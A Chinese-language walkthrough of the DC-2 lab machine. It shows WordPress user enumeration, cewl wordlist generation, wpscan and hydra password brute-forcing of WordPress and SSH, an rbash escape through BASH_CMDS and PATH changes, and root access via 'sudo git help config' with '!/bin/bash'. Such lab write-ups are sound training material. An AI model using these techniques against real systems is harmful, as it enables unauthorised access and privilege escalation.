DC-2靶机学习

1.打开是一个wordpress的主题

想到可以用wpsacn先扫描一波

root@kali:~# wpscan --url http://dc-2

无果，枚举一下用户看看

root@kali:~# wpscan --url http://dc-2 -e u

就三个用户，admin，tom,jerry
随手整了个top500字典爆破三个账户，无果

2. cewl的提示

实在没头绪就看了下提示，说是用 cewl
搜了下 cewl是个生成字典的工具
详见https://www.freebuf.com/articles/network/190128.html

root@kali:~# cewl dc-2 > dc-2.txt

爬取网站生成字典

再拿去爆破

root@kali:~# wpscan --url http://dc-2 --passwords /root/dc-2.txt --usernames /root/username.txt 

破解出来了，赶紧登陆试试

但是这两个账户只是普通账户，还要提升权限

3.flag2的提示

没看懂啥意思，换个账号登陆下康康
tom账号啥都没有，叹气
到后台，我觉得可能是后台getshell
但是普通用户没有上传权限，这就很难受
https://www.cnblogs.com/ssw6/p/12668000.html
这是一点后台提权的总结

4.柳暗花明

整到这里忽然想起来之前扫描的时候靶机还有个ssh端口是开着的

root@kali:~# nmap -A -p- -Pn 192.168.2.130

或许有ssh弱口令也说不定
我用的是hydra破解密码

root@kali:~# hydra -L /root/username.txt -P /root/dc-2.txt -t 6 -s 7744 ssh://192.168.2.130

运气不错，emmmm,只是这个密码和之前登陆后台的密码一样，23333

5.rbash

利用hydra破解的ssh密码，登陆发现似乎又是一个死胡同，无法执行有效的命令

这里有个flag3.txt，看不到，悲伤（绕沙盒的感觉）
摸了半天，无意中试出来个vi命令，好像可以打开文本文件，23333

vi flag3.txt

这话没看明白，猫和老鼠里面的tom和jerry吗？
问题还是归结到rbash上去
翻了很久终于找到一篇文章
https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html
另外一篇是讲绕过的手段的
https://www.freebuf.com/articles/system/188989.html

很奇妙的说，直接就使得path和shell可写了

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash

然后再

tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

可以看到这里PATH已经导入了系统命令
尝试一下系统命令

tom@DC-2:~$ whoami
tom
tom@DC-2:~$ ls -lah
total 48K
drwxr-x--- 3 tom  tom  4.0K May  9 17:43 .
drwxr-xr-x 4 root root 4.0K Mar 21  2019 ..
-rwxr-x--- 1 tom  tom    66 Mar 21  2019 .bash_history
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_login
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_logout
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_profile
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bashrc
-rwxr-x--- 1 tom  tom    95 Mar 21  2019 flag3.txt
-rw------- 1 tom  tom    49 May  9 17:42 .lesshst
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .profile
drwxr-x--- 3 tom  tom  4.0K Mar 21  2019 usr
-rw------- 1 tom  tom    50 May  9 17:25 .Xauthority

成功逃逸沙盒，害为啥我就想不到呢

6.提权root

这里卡了好久，跑去翻wp去了，意料之外的是jerry这一步
在命令行下切换用户，真的NP

jerry@DC-2:~$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

jerry@DC-2:~$ 

这里有提示git提权
提权指导：https://www.cnblogs.com/zaqzzz/p/12075132.html
这一步很轻松

jerry@DC-2:~$ sudo git help config
然后输入
!/bin/bash或者！'sh'完成提权

我特么吹爆，太强了（然而我还是太菜了）